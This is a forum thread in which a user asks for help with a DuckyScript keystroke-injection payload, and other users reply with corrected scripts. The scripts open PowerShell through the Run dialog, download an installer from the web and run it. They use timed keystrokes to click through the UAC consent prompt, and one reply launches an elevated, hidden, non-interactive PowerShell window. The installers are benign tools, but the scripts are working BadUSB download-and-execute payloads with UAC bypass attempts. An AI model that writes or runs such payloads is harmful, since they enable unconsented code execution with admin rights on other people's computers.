Jump to content

Need Help with my DuckyScript


Joelbu

Recommended Posts

I wrote a simple script which installs a setup via powershell, which wokrs completeley fine.
But when the setup starts, theres an UAC asking for you to allow the application to make changes, we all know that one...
But I cant get past it, Ive tried Leftarrow and 2x Tab(with a delay between them).
It just doesnt work, and im nut exactly sure what I have to fix, however I think there might be something wrong with the Delays... (Theres enough time to install, I have measured it with a timer multiple times)

This is the part of my script:

WAIT_FOR_BUTTON_PRESS
ATTACKMODE HID
GUI r
DELAY 250
STRINGLN powershell
DELAY 1000
STRING powershell -command "Invoke-WebRequest -Uri 'https://nmap.org/dist/nmap-7.94-setup.exe' -OutFile 'nmap-7.94-setup.exe'; Start-Process .\nmap-7.94-setup.exe -Wait"
DELAY 50
ENTER
DELAY 40000
TAB
DELAY 500
TAB
DELAY 500
ENTER

 

Thank you guys!

Link to comment
Share on other sites

Try this (working for me, using another exe though, don't want to wait...)

DELAY 3000
GUI r
DELAY 250
STRINGLN powershell
DELAY 5000
STRING Invoke-WebRequest -Uri https://github.com/notepad-plus-plus/notepad-plus-plus/releases/download/v8.5.4/npp.8.5.4.Installer.x64.exe -OutFile npp.8.5.4.Installer.x64.exe; Start-Process .\npp.8.5.4.Installer.x64.exe -Wait
DELAY 250
ENTER
DELAY 10000
LEFTARROW
DELAY 500
ENTER

 

Link to comment
Share on other sites

6 hours ago, Joelbu said:

I wrote a simple script which installs a setup via powershell, which wokrs completeley fine.
But when the setup starts, theres an UAC asking for you to allow the application to make changes, we all know that one...
But I cant get past it, Ive tried Leftarrow and 2x Tab(with a delay between them).
It just doesnt work, and im nut exactly sure what I have to fix, however I think there might be something wrong with the Delays... (Theres enough time to install, I have measured it with a timer multiple times)

This is the part of my script:

WAIT_FOR_BUTTON_PRESS
ATTACKMODE HID
GUI r
DELAY 250
STRINGLN powershell
DELAY 1000
STRING powershell -command "Invoke-WebRequest -Uri 'https://nmap.org/dist/nmap-7.94-setup.exe' -OutFile 'nmap-7.94-setup.exe'; Start-Process .\nmap-7.94-setup.exe -Wait"
DELAY 50
ENTER
DELAY 40000
TAB
DELAY 500
TAB
DELAY 500
ENTER

 

Thank you guys!

I would run powershell as admin and then the payload as a child process. Don't know what Tab will do for UAC. You're also missing an ENTER. 

EXTENSION DETECT_READY

END_EXTENSION

ATTACKMODE HID
GUI r
DELAY 250

STRING powershell

CTRL SHIFT ENTER
DELAY 1000
STRING powershell -NoP -NonI -W Hidden command "Invoke-WebRequest -Uri 'https://nmap.org/dist/nmap-7.94-setup.exe' -OutFile 'nmap-7.94-setup.exe'; Start-Process .\nmap-7.94-setup.exe -Wait"

ENTER 

DELAY 40000

This will get you as far running the Nmap installer. 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...